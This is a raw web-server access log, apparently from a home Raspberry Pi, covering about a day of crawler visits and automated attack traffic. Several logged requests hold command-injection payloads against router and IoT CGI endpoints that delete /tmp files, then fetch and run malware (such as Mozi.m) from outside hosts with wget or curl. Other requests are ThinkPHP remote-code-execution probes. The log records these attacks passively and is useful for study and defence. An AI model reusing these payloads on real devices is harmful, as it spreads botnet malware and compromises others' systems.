Wed Sep 23 06:25:45 MDT 2020 06:25:45 up 34 days, 17:44, 1 user, load average: 3.97, 3.35, 3.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 19Aug20 34days 2:30m 5.54s /usr/bin/lxsession -s LXDE-pi -e LXDE 193.239.147.184 - - [23/Sep/2020:12:33:52 +0000] "HEAD / HTTP/1.0" 200 0 "" "" 66.249.70.127 - - [23/Sep/2020:13:22:40 +0000] "GET /ac0xl/logs/2020.06.19 HTTP/1.1" 200 446935 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 79.133.100.206 - - [23/Sep/2020:14:48:20 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 104.175.216.44 - - [23/Sep/2020:15:52:16 +0000] "GET /favicon.ico HTTP/1.1" 200 533 "http://162.250.19.7/ac0xl/Dont-Be-Evil/Hiring%20Practices/Offer%20Review%20-%20Ann%20Arbor%20Preso.pdf" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.175.216.44 - - [23/Sep/2020:15:52:17 +0000] "GET /ac0xl/Dont-Be-Evil/Hiring%20Practices/Offer%20Review%20-%20Ann%20Arbor%20Preso.pdf HTTP/1.1" 200 395917 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 111.225.148.74 - - [23/Sep/2020:16:44:38 +0000] "GET /ac0xl/www/slackbook/security-depth:6 HTTP/1.1" 404 0 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)" 111.225.149.75 - - [23/Sep/2020:16:45:05 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)" 81.41.135.82 - - [23/Sep/2020:16:47:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 186.29.180.79 - - [23/Sep/2020:16:52:16 +0000] "GET / HTTP/1.1" 400 0 "" "" 156.96.112.211 - - [23/Sep/2020:17:04:03 +0000] 
"GET / HTTP/1.1" 200 25000 "" "" 45.148.10.28 - - [23/Sep/2020:17:56:26 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 134.19.215.196 - - [23/Sep/2020:17:58:51 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" "" 134.19.215.196 - - [23/Sep/2020:17:58:51 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 173.252.107.7 - - [23/Sep/2020:18:14:46 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Twiddler%20Quick%20Start%20Guide%20-%20Superroot.pdf HTTP/1.1" 200 266240 "" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 66.249.70.125 - - [23/Sep/2020:19:03:39 +0000] "GET /downloads/g2churchbooks.org/IMAGINA%20UN%20MUNDO%20SIN%20MAL-ESTAR%20%28ESPAN%CC%83OL%29%20%2810%20-%2010%20-18%29.pdf HTTP/1.1" 200 4750121 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.70.125 - - [23/Sep/2020:19:03:59 +0000] "GET /downloads/g2churchbooks.org/IMAGINA%20UN%20MUNDO%20SIN%20MAL-ESTAR%20%28ESPAN%CC%83OL%29%20%2810%20-%2010%20-18%29.pdf HTTP/1.1" 200 5017025 "" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 91.234.62.17 - - [23/Sep/2020:19:36:24 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 183.136.225.56 - - [23/Sep/2020:19:42:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 94.102.51.119 - 
- [23/Sep/2020:19:59:10 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 51.195.151.247 - - [23/Sep/2020:20:43:35 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1" 66.249.70.123 - - [23/Sep/2020:21:18:16 +0000] "GET /ads.txt HTTP/1.1" 404 0 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.70.123 - - [23/Sep/2020:21:18:17 +0000] "GET /robots.txt HTTP/1.1" 200 70 "" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.70.123 - - [23/Sep/2020:21:32:17 +0000] "GET /ac0xl/www/2003-ArchHunterBooks/images/6201s.jpg HTTP/1.1" 404 0 "" "Googlebot-Image/1.0" 162.243.128.132 - - [23/Sep/2020:22:03:32 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 50.92.138.39 - - [23/Sep/2020:22:21:31 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 50.92.138.39 - - [23/Sep/2020:22:22:06 +0000] "GET /downloads/g2churchbooks.org/Vol.%20III%20Imagine%2C%20A%20World%20Without%20DIS-EASE%205-29-20%20-FINAL%20EDIT.pdf HTTP/1.1" 200 14935627 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 185.172.111.202 - - [23/Sep/2020:22:28:04 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/zoooteedd.sh%20-O HTTP/1.0" 404 0 "" "" 50.92.138.39 - - [23/Sep/2020:22:34:30 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 50.92.138.39 - - [23/Sep/2020:22:34:48 +0000] "GET /downloads/g2churchbooks.org/eBook%20-%20Imagine%20-%20Vol.%20II%201-23-20%20-%20Final%21%20-%20.pdf HTTP/1.1" 200 11081049 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" 192.241.234.251 - - [24/Sep/2020:00:30:40 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 185.172.111.202 - - [24/Sep/2020:00:35:22 +0000] "GET 
/cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.sh%20-O%2 HTTP/1.0" 404 0 "" "" 199.195.254.38 - - [24/Sep/2020:02:31:02 +0000] "UNKNOWN HTTP" 400 0 "" "" 45.148.10.28 - - [24/Sep/2020:02:34:22 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.241.234.58 - - [24/Sep/2020:02:34:26 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 94.102.51.119 - - [24/Sep/2020:02:40:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Linux Gnu (cow) " 66.249.70.127 - - [24/Sep/2020:02:51:18 +0000] "GET /ac0xl/www/2005-museumarchives/Green-River-History/Green_River_History_Book/grhb1901.gif HTTP/1.1" 304 0 "" "Googlebot-Image/1.0" 202.83.44.114 - - [24/Sep/2020:02:52:58 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 123.4.89.99 - - [24/Sep/2020:03:57:15 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.89.99:45804/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" "" 218.32.211.117 - - [24/Sep/2020:04:02:59 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 218.32.211.117 - - [24/Sep/2020:04:03:03 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 218.32.211.113 - - [24/Sep/2020:04:09:27 +0000] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 0 "" "" 66.249.70.125 - - [24/Sep/2020:04:54:33 +0000] "GET /ac0xl/www/2005-museumarchives/Raw-Data/1946.Green.River.Yearbook/Activities%207.tif HTTP/1.1" 200 16348318 "" "Googlebot-Image/1.0" 66.240.205.34 - - 
[24/Sep/2020:05:44:09 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.227 - - [24/Sep/2020:05:56:20 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.227 - - [24/Sep/2020:05:56:26 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.227 - - [24/Sep/2020:05:56:32 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 5.188.210.227 - - [24/Sep/2020:05:57:46 +0000] "GET /echo.php HTTP/1.1" 404 0 "https://www.google.com/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 49.68.192.201 - - [24/Sep/2020:05:58:28 +0000] "POST /HNAP1/ HTTP/1.0" 404 0 "" "" 176.113.115.214 - - [24/Sep/2020:06:07:26 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 176.113.115.214 - - [24/Sep/2020:06:16:03 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 176.113.115.214 - - [24/Sep/2020:06:26:36 +0000] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 176.113.115.214 - - [24/Sep/2020:06:33:49 +0000] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 66.249.70.125 - - [24/Sep/2020:07:44:10 +0000] "GET /ac0xl/Dont-Be-Evil/Fake%20News/Paul%20Haahr_%20Google%20Resume.pdf HTTP/1.1" 200 194891 "" "Googlebot/2.1 (+http://www.google.com/bot.html)" 60.191.125.35 - - [24/Sep/2020:07:48:16 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 60.191.125.35 - - [24/Sep/2020:07:48:18 +0000] "HEAD / HTTP/1.1" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like 
Gecko) Chrome/53.0.2785.143 Safari/537.36" 176.113.115.214 - - [24/Sep/2020:08:35:03 +0000] "POST /api/jsonws/invoke HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 192.241.235.126 - - [24/Sep/2020:09:38:57 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 45.148.10.28 - - [24/Sep/2020:10:06:02 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 0 "" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 185.172.111.202 - - [24/Sep/2020:10:37:38 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://185.172.111.196/awGawgf.sh%20-O%2 HTTP/1.0" 404 0 "" "" 37.233.77.228 - - [24/Sep/2020:10:39:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0" 176.10.99.200 - - [24/Sep/2020:11:46:07 +0000] "HEAD /MjZL HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" 23.129.64.100 - - [24/Sep/2020:11:47:29 +0000] "UNKNOWN UNKNOWN" 408 0 "" "" 27.5.46.215 - - [24/Sep/2020:11:49:52 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 0 "" "Hello, World" Thu Sep 24 06:25:19 MDT 2020 06:25:19 up 21:30, 1 user, load average: 0.98, 1.41, 1.76 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 Wed08 22:08m 2:53 0.47s /usr/bin/lxsession -s LXDE-pi -e LXDE